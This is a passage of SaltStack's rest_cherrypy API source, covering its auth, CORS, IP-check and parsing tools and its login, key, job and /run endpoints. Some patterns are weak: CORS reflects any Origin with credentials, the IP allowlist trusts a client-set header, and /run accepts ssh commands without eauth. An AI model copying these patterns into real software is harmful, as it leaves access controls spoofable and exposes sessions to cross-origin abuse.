websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
..versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
raise cherrypy.HTTPError(403, 'Bad IP')
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == 'OPTIONS':
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = [
'Content-Type',
'X-Auth-Token',
'X-Requested-With',
]
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
# CORS requests should short-circuit the other tools.
cherrypy.response.body = ''
cherrypy.response.status = 200
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session['token'] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', salt.utils.json.dumps),
('application/x-yaml', functools.partial(
salt.utils.yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.StringIO(pub_key))
tarball.addfile(priv_key_file, six.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = fileobj.len
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of :term:`lowstate` data describing Salt commands must be
sent in the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instad,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
